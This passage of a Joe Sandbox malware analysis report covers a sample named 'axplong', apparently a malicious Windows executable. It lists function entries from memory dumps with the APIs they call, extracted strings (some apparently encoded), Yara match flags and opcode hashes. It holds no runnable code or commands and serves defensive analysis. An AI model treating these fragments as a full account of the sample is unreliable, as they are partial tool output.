                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoNativeSystem
                    • String ID: JmpxQb==$JmpxRL==$JmpyPb==
                    • API String ID: 1721193555-2057465332
                    • Opcode ID: 3ed605395c1b6e3f8c4db3eaed0ff9c59ffa814c8ffc1942ac4dabd2bbfc9e62
                    • Instruction ID: 1cf1a0ca86a0173f355ee6a3ba883c814136668f31a6402d425408349f975e6f
                    • Opcode Fuzzy Hash: 3ed605395c1b6e3f8c4db3eaed0ff9c59ffa814c8ffc1942ac4dabd2bbfc9e62
                    • Instruction Fuzzy Hash: 8DD1F8B1E00618EBEF24BB68DC4A39D7765AB42320F544288E4156B3D3DB3D4E81C7D2

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    APIs
                    • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00766E23
                    • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00766E7D
                    • __dosmaperr.LIBCMT ref: 00766F12
                      • Part of subcall function 00767177: __dosmaperr.LIBCMT ref: 007671AC
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: File__dosmaperr$HandleInformationType
                    • String ID:
                    • API String ID: 2531987475-0
                    • Opcode ID: a657b7e72c503cced87977d2dfbf27031fb9b12fd67beaa1c708dc82db792c1c
                    • Instruction ID: a9664dc861eea2e85820e5b71717052783452baa331f0cd1e31ba4ed6077a920
                    • Opcode Fuzzy Hash: a657b7e72c503cced87977d2dfbf27031fb9b12fd67beaa1c708dc82db792c1c
                    • Instruction Fuzzy Hash: AE415E75900244ABCB24EFB5E8559EFBBF9EF89300B50442DF857D3211EB39A904CB61

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    APIs
                    • GetNativeSystemInfo.KERNELBASE(?), ref: 00738454
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoNativeSystem
                    • String ID:
                    • API String ID: 1721193555-0
                    • Opcode ID: 57a053e113f5d334756acaefd7678fd26d082a3da7924eaabba976ed38b20399
                    • Instruction ID: 9386aa6e81423a1e7e2c44b20c8d80c54fee21128bdb88b654613bf169df4c2f
                    • Opcode Fuzzy Hash: 57a053e113f5d334756acaefd7678fd26d082a3da7924eaabba976ed38b20399
                    • Instruction Fuzzy Hash: 53512770D003589BEB24EF68DD497EDB7759B46300F504299F818A73C2EF395E808BA2

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 29aa5cea1776ec22b8f5d77925e5ca1589dc533a6258ec1d241e22e496328f1a
                    • Instruction ID: 551971a691f0b195b9eb2bf4da0df2137325629349fc100056cf8c99387dbae1
                    • Opcode Fuzzy Hash: 29aa5cea1776ec22b8f5d77925e5ca1589dc533a6258ec1d241e22e496328f1a
                    • Instruction Fuzzy Hash: BA21F871A05208FAEF117B649C4AB9F3B299F427B8F600314FD253B1D1DB785E0596A1

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    APIs
                    • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00766FB3
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$LocalSpecificSystem
                    • String ID:
                    • API String ID: 2574697306-0
                    • Opcode ID: 3d0aa8a31876fd670ba15d0f357beedc118e3fa19951c7cc6768598defcbb5ba
                    • Instruction ID: 5e5924eb2f7b3b7b05a304d019ddc00c9d970235afb740f69a450c199e9a11fa
                    • Opcode Fuzzy Hash: 3d0aa8a31876fd670ba15d0f357beedc118e3fa19951c7cc6768598defcbb5ba
                    • Instruction Fuzzy Hash: 4D11F17690020CBBDB10DED5D944EDFB7BCAF48310F505266E912E6181E734EB45CB61

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 057199cc2ce8aa9d60e17bba5164080899379056b61caf419f5f63d38a73ba7e
                    • Instruction ID: 8cfa3ea1c8b1317f7f18d33f3b3a37c6f1c1f7c15e0e9641461eb7501bcbcc19
                    • Opcode Fuzzy Hash: 057199cc2ce8aa9d60e17bba5164080899379056b61caf419f5f63d38a73ba7e
                    • Instruction Fuzzy Hash: D6F0D6B1A00508FBC600BBA89C0A71DBB69A707760F904348E811672E2DB3C590587D3

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    Memory Dump Source
                    • Source File: 00000005.00000002.3019009769.0000000005160000.00000040.00001000.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_5160000_axplong.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d3ce13f52e68776fbc09a6596cf4504b449d21bc1683b88fa80adf9c3af40645
                    • Instruction ID: b952f9b433819b3256d5c5fae2aa7c3f361dfcded49fd60d6f18dd9d89458f6a
                    • Opcode Fuzzy Hash: d3ce13f52e68776fbc09a6596cf4504b449d21bc1683b88fa80adf9c3af40645
                    • Instruction Fuzzy Hash: 7A1138A704C200EFD76EC585564CA7A7B6BFB9E330732402EF4138B242E3A449758162
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: __floor_pentium4
                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                    • API String ID: 4168288129-2761157908
                    • Opcode ID: bf7d95c37166d9c42f68f02500fc01dda31090cb00151672483caa01a91fd6f8
                    • Instruction ID: 5c7d0aa2b7c205575b544c5a5490682bffa7a11dae9c6351ab1d07c2af11efd4
                    • Opcode Fuzzy Hash: bf7d95c37166d9c42f68f02500fc01dda31090cb00151672483caa01a91fd6f8
                    • Instruction Fuzzy Hash: 34C24C71E046288FDF25CE28DD447E9B3B5EB48384F1481EAD84EE7241E779AE819F41
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                    • Instruction ID: 8d671e69bc5bb6c65c41c700559e3742d88c0762123bd662ac411d672d7e15cc
                    • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                    • Instruction Fuzzy Hash: A1F13071E012199FDF14CFA8C8806ADB7B1FF48354F25826AD829A7345D735AE42CB90
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 0073247E
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: 'ktd+y$'ktd+y
                    • API String ID: 2659868963-2254888460
                    • Opcode ID: 131caa5c6a75e1db3aa142f8a91ff4f0cf6b4a7e87bcafd2bc658deb3188b606
                    • Instruction ID: 3f5efd95f58717d29b0a76e4c37faa8d0602e4310d032f04cd7ab56d264c91b5
                    • Opcode Fuzzy Hash: 131caa5c6a75e1db3aa142f8a91ff4f0cf6b4a7e87bcafd2bc658deb3188b606
                    • Instruction Fuzzy Hash: 305178B1E006159FDB25CF58D8856AABBF0FB08310F24C56BE845EB251D7789D42CF54
                    APIs
                    • GetSystemTimePreciseAsFileTime.KERNEL32(?,0074CE82,?,?,?,?,0074CEB7,?,?,?,?,?,?,0074C42D,?,00000001), ref: 0074CB33
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$FilePreciseSystem
                    • String ID:
                    • API String ID: 1802150274-0
                    • Opcode ID: e84935c24c7dcf0aa820a4faba437fc617b3aae77a3478d279b1e8819e77cd8f
                    • Instruction ID: d778846981c88244e8e5428d19d04664dda7db8385baefd5a4c6c7a155f4a397
                    • Opcode Fuzzy Hash: e84935c24c7dcf0aa820a4faba437fc617b3aae77a3478d279b1e8819e77cd8f
                    • Instruction Fuzzy Hash: 98D02232A4343893CA433BA0AC088ACBB18DE04BA07004122EC0463530CB5C5C418BD8
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0
                    • API String ID: 0-4108050209
                    • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                    • Instruction ID: 19a17a3a9160326ade8cb602582e20f869d763b0eca62ed52d5ece7600c4f83c
                    • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                    • Instruction Fuzzy Hash: D351467020C64896DB3C8A3888DABBE679A9F513CCF180959DC43D7682DB1F9D8DC352
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f0fc92efffa3b9696a93c623d32dacd184f57112ed9544b16727a8d0f198837e
                    • Instruction ID: 72ac8bda2c0c9951f7ad5bd6d0e54bbd7daca1de749cabb472c172d7e9dce897
                    • Opcode Fuzzy Hash: f0fc92efffa3b9696a93c623d32dacd184f57112ed9544b16727a8d0f198837e
                    • Instruction Fuzzy Hash: CC2250B3F515144BDB4CCB9DDCA27EDB2E3AFD8214B0E803DA40AE3345EA79D9158648
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 422f75966a542c23c3a9601e64454b16d3a5190dc110eea02118c6f525420ff7
                    • Instruction ID: 65f2dc3d8038b9923dd97b32ea4571edb06c572198f66a21a278cc916e19e330
                    • Opcode Fuzzy Hash: 422f75966a542c23c3a9601e64454b16d3a5190dc110eea02118c6f525420ff7
                    • Instruction Fuzzy Hash: 80B14B31214609DFDB19CF28C486B657BA0FF453A4F69C658E89DCF2A1C739E992CB40
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2ee79290acdcc07def22c631f4171e0b93e977a145c7c6f375487a2622764d98
                    • Instruction ID: 7142dcd081835c95b9ed0cb7a12be262c110b12634f907cc0d9a6519ee34cd2f
                    • Opcode Fuzzy Hash: 2ee79290acdcc07def22c631f4171e0b93e977a145c7c6f375487a2622764d98
                    • Instruction Fuzzy Hash: 8551D47160C3918FD329CF2C811563AFFE1AF85200F084A9EE0D687292D738DA44CBA2
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2ac88e4d854f1e1049c3f4bfd1526469aba53505310f75e620b20a0ee98c53d9
                    • Instruction ID: b296bebcc215be54c4760f2d58c0a4d614b19de5b548c0ade1729dc995fa3afb
                    • Opcode Fuzzy Hash: 2ac88e4d854f1e1049c3f4bfd1526469aba53505310f75e620b20a0ee98c53d9
                    • Instruction Fuzzy Hash: A421B673F204394B7B0CC47ECC5727DB6E1C68C541745823AE8A6EA2C1D96CD917E2E4
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cc15c47706f33a0ba429c53f2f3d82a2c6615a8ca4f3e7aba18d5def44229feb
                    • Instruction ID: 987ec778a1859dcbf423a697429a84b66fc992dbf53d0af6eefec0167b131c6c
                    • Opcode Fuzzy Hash: cc15c47706f33a0ba429c53f2f3d82a2c6615a8ca4f3e7aba18d5def44229feb
                    • Instruction Fuzzy Hash: A4117723F30C255A675C816D8C1727AA5D2DBD825071F933AD826E7284E994DE23D290
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction ID: d3084f7ff709a45d2003f3e0bd90a915fba0749d581570a060bab27222b32b42
                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction Fuzzy Hash: 38113B772C014143DE8C86ADC8FC5B6A795EBD53A173CC375C04B4B758D92A9944D582
                    Memory Dump Source
                    • Source File: 00000005.00000002.3019009769.0000000005160000.00000040.00001000.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_5160000_axplong.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 88eafd3b0938db72e3bcdc954b72eef72cfccaa84d53b5525971d234960bee1a
                    • Instruction ID: 1a1330c828b9701e564b161c0729822c045748653f5fce8d2963e4afcb932acd
                    • Opcode Fuzzy Hash: 88eafd3b0938db72e3bcdc954b72eef72cfccaa84d53b5525971d234960bee1a
                    • Instruction Fuzzy Hash: AAF02DEB18C110BE60599242576C9FA7E6FF0CB3713338866F00B81902E3950E595532
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5138e552f66906c2273a38c3c40d75469677b302a9e24522611a531d9b9f178d
                    • Instruction ID: 8fbd327b64a15356a50c72de24f78ce9fa09ce91e360370db9a71f3fc29cbf2c
                    • Opcode Fuzzy Hash: 5138e552f66906c2273a38c3c40d75469677b302a9e24522611a531d9b9f178d
                    • Instruction Fuzzy Hash: 41E04630240688ABCA357B18C84CD483B6AEF92750F404818FC0686622CB29EEC1CA90
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                    • Instruction ID: 5e06f4e0f01ff9ac68bbac1804f62b9149e23dc21f6815d1faaf64e383075de4
                    • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                    • Instruction Fuzzy Hash: E5E0B672A15228FBCB19DB98894898AF2BCFB4AB50F554496B902E3251C274DF40CBD1
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
                    • API String ID: 0-2390467879
                    • Opcode ID: dc18a6381d8d71762b688cdd653415797e099acee561196ddcf9195f4a295273
                    • Instruction ID: 19943748f8cbcbabb8039b3a79d941fa83cd998fe94799429cf8421e7e539272
                    • Opcode Fuzzy Hash: dc18a6381d8d71762b688cdd653415797e099acee561196ddcf9195f4a295273
                    • Instruction Fuzzy Hash: 2802B271A00248EFEF14EFA8C849BDEBBB5EF05304F504559E805A7282D7799A85CBA1
                    APIs
                    • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0074795C
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00747968
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00747971
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                    • String ID: 'ktd+y$@yt$d+y
                    • API String ID: 4078500453-2595975181
                    • Opcode ID: 9fc825874fe5ae41b863ea57054de57bba78dd2086b779376678532b4d35fed9
                    • Instruction ID: 9a2fd30511a5d095308893157e6ef3552b787bf2fdfddd3820495471e2aaea97
                    • Opcode Fuzzy Hash: 9fc825874fe5ae41b863ea57054de57bba78dd2086b779376678532b4d35fed9
                    • Instruction Fuzzy Hash: 3F31E3B2904304DBD724DF68D849A6AB7E8EF15310F100A3EE946C7242E779FA54C7E1
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wcsrchr
                    • String ID: .bat$.cmd$.com$.exe
                    • API String ID: 1752292252-4019086052
                    • Opcode ID: 9e18ae43efa262ab899841182ff182a4f34fe7d77519326da56073f2e0017db8
                    • Instruction ID: 7f544fd024ab1fa71a9b843776344d7c18ad0a0feb89aba394441fe9a3c31b8f
                    • Opcode Fuzzy Hash: 9e18ae43efa262ab899841182ff182a4f34fe7d77519326da56073f2e0017db8
                    • Instruction Fuzzy Hash: BB01E17764821A62261C245C9C0663B17889FC3BF8729002BFD45E72C2EE4CEC4386A4
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Cnd_broadcast
                    • String ID:
                    • API String ID: 32384418-0
                    • Opcode ID: 01c8aaad46a5f3f19005c322d117c2dd7344339514e962d2f8e4713fa26b9aff
                    • Instruction ID: b8c39be04396addad4c9257268382cfb360cc1da9f25f4787d6a5f2f7dbedca1
                    • Opcode Fuzzy Hash: 01c8aaad46a5f3f19005c322d117c2dd7344339514e962d2f8e4713fa26b9aff
                    • Instruction Fuzzy Hash: F1A1E2B1A0160AEFEB21DF64C84876AB7B9FF15314F048169E815D7243EB39EA05CBD1
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 00732806
                    • ___std_exception_destroy.LIBVCRUNTIME ref: 007328A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy___std_exception_destroy
                    • String ID: P#s$P#s
                    • API String ID: 2970364248-3048905328
                    • Opcode ID: 91fba2c220c48daa94afd97f9ceb651fe80d38ac929c0034e2c330b1b66d476b
                    • Instruction ID: 71be58dae8cb7366eab1d51d6459b5993fffbc9379a837877f3310b1153f3d16
                    • Opcode Fuzzy Hash: 91fba2c220c48daa94afd97f9ceb651fe80d38ac929c0034e2c330b1b66d476b
                    • Instruction Fuzzy Hash: BE717071E00208DBDB04DFA8C885ADDFBB5FF59310F14812DE805A7242EB78A955CBA5
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 00732B23
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: P#s$P#s$This function cannot be called on a default constructed task
                    • API String ID: 2659868963-4219113655
                    • Opcode ID: bc96861516b188d6b5bcf3e7a48e7270c8b1c5995ec8930fe77a3071d12b33d9
                    • Instruction ID: b797e42139534866eb157c91407010800fe30ba6f949408a54a5bd09daec0e94
                    • Opcode Fuzzy Hash: bc96861516b188d6b5bcf3e7a48e7270c8b1c5995ec8930fe77a3071d12b33d9
                    • Instruction Fuzzy Hash: 1EF0F671E1030CABC710EFA8E84599EB7ED9F05300F5081AEF80497202EB78AA59CB95
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 0073247E
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: 'ktd+y$P#s$P#s
                    • API String ID: 2659868963-3913168152
                    • Opcode ID: e8846774ddd4281305c3eb180b79eb4a6c84269134a3418f92409402ad9da903
                    • Instruction ID: 62a85aac4df2769ebe67715bc46401bf6ce6fc32cc035c81b56bccc53bc4979b
                    • Opcode Fuzzy Hash: e8846774ddd4281305c3eb180b79eb4a6c84269134a3418f92409402ad9da903
                    • Instruction Fuzzy Hash: 35F0A0B291020CABC714FAE8E805889B3ACDE15300B008A25FA44E7501FB78FA5887E1
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strrchr
                    • String ID:
                    • API String ID: 3213747228-0
                    • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                    • Instruction ID: 2a07907df624845e59897b6b233fa5106ab29bb796c1538434d6c67d7b1b613c
                    • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                    • Instruction Fuzzy Hash: 66B148729002859FDB12CF68C895BBEBBE5EF55340F1481AADC8AEB341D63C9D41CB61
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Xtime_diff_to_millis2_xtime_get
                    • String ID:
                    • API String ID: 531285432-0
                    • Opcode ID: b40e31c2b88fd6d58c31caf35f55da4e95c1d096f6acf270acc4791d7ef79b84
                    • Instruction ID: 0b0655097348a4e9b9c8f4e07ae4118b6e8c198be9afb237e13756f56bcc7c81
                    • Opcode Fuzzy Hash: b40e31c2b88fd6d58c31caf35f55da4e95c1d096f6acf270acc4791d7ef79b84
                    • Instruction Fuzzy Hash: FF216071A01219EFDF51EFA4DC859BEBBB8EF08714F104069F601A7261DB78AD018BA1
                    APIs
                    • __Mtx_init_in_situ.LIBCPMT ref: 0074726C
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_init_in_situ
                    • String ID: @.s$`zt
                    • API String ID: 3366076730-3213656910
                    • Opcode ID: 795de3b8b0914a7bc48fa9b9774ba050f9f9e74a60e314ab086ec445dbff41c0
                    • Instruction ID: 5995b0a9c8c0e069d767e3d23405f3c8ff28a6c0932d6e5ae033270a4f47965e
                    • Opcode Fuzzy Hash: 795de3b8b0914a7bc48fa9b9774ba050f9f9e74a60e314ab086ec445dbff41c0
                    • Instruction Fuzzy Hash: E7A136B0A01619CFDB25CFA8C88479EBBF1BF48710F19815AE819AB351E7799D01CB90
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___free_lconv_mon
                    • String ID: 8"y$`'y
                    • API String ID: 3903695350-752720508
                    • Opcode ID: 205b229697aa8699bdc17c5d9e0217a6be05cdf488427efff51a582980eead8e
                    • Instruction ID: 4d42fdda6bccc7f5abb87f572fd01e27a471264e880e28e0897814c4f7e937bc
                    • Opcode Fuzzy Hash: 205b229697aa8699bdc17c5d9e0217a6be05cdf488427efff51a582980eead8e
                    • Instruction Fuzzy Hash: 8B313831600305EFEB21AB79E949B5A73E9BF40320F144429EC5BE7291DF79AC848F21
                    APIs
                    • __Mtx_init_in_situ.LIBCPMT ref: 00733962
                    • __Mtx_init_in_situ.LIBCPMT ref: 007339A1
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_init_in_situ
                    • String ID: pBs
                    • API String ID: 3366076730-2700328003
                    • Opcode ID: 9d21390640b103d901f824c0584d682a613660758cd8e951a8f478d7786353ae
                    • Instruction ID: f25ea1a5fbff91ff42b63b95ae837ea8f44512d78cfb34a0bd4318f83c8860b9
                    • Opcode Fuzzy Hash: 9d21390640b103d901f824c0584d682a613660758cd8e951a8f478d7786353ae
                    • Instruction Fuzzy Hash: D84103B0501B05DFE720CF19C588B5ABBF4FF44315F148619E96A8B341E7B9EA15CB80
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 00732552
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: P#s$P#s
                    • API String ID: 2659868963-3048905328
